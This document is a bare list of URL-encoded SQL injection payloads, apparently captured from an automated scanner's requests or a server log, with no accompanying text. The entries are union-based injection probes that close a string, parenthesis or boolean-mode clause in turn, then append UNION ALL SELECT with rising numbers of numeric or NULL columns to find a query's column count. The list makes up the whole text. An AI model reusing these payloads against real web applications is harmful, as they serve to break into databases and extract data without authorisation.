-1854%27%2B%28SELECT%20XXVx%20WHERE%208772%3D8772%20UNION%20ALL%20SELECT%208772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772%2C8772--%20 -3873%27%2B%28SELECT%20%27riPM%27%20WHERE%203945%3D3945%20UNION%20ALL%20SELECT%203945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945--%20 -7845%27%2B%28SELECT%20%27mRKu%27%20WHERE%208416%3D8416%20UNION%20ALL%20SELECT%208416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416%2C8416--%20 -6520%27%2B%28SELECT%20%27tjKU%27%20WHERE%207433%3D7433%20UNION%20ALL%20SELECT%207433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433%2C7433--%20 -4164%27%2B%28SELECT%20%27gcEe%27%20WHERE%203844%3D3844%20UNION%20ALL%20SELECT%203844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844%2C3844--%20 -7485%27%2B%28SELECT%20%27SmOw%27%20WHERE%205905%3D5905%20UNION%20ALL%20SELECT%205905%2C5905%2C5905%2C5905%2C5905%2C5905%2C5905%2C5905%2C5905%2C5905%2C5905%2C5905%2C5905%2C5905%2C5905--%20 -4283%27%2B%28SELECT%20%27drkY%27%20WHERE%209731%3D9731%20UNION%20ALL%20SELECT%209731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731%2C9731--%20 -4276%27%2B%28SELECT%20%27irQq%27%20WHERE%203730%3D3730%20UNION%20ALL%20SELECT%203730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730--%20 -8788%27%2B%28SELECT%20%27YCwJ%27%20WHERE%205775%3D5775%20UNION%20ALL%20SELECT%205775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775%2C5775--%20 -5069%27%2B%28SELECT%20%27EsXn%27%20WHERE%206028%3D6028%20UNION%20ALL%20SELECT%206028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028%2C6028--%20 -6350%27%2B%28SELECT%20%27uaWg%27%20WHERE%205251%3D5251%20UNION%20ALL%20SELECT%205251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251%2C5251--%20 -8234%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823--%20 -9636%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204794%2C4794%2C4794%2C4794%2C4794%2C4794%2C4794%2C4794%2C4794%2C4794%2C4794%2C4794--%20 -5942%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159%2C1159--%20 -4772%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238%2C1238--%20 -1384%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204514%2C4514%2C4514%2C4514%2C4514%2C4514%2C4514%2C4514%2C4514%2C4514%2C4514%2C4514%2C4514%2C4514%2C4514--%20 -7262%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020%2C9020--%20 -4009%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301--%20 -7403%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919--%20 -6935%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702%2C4702--%20 -5382%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106%2C1106--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 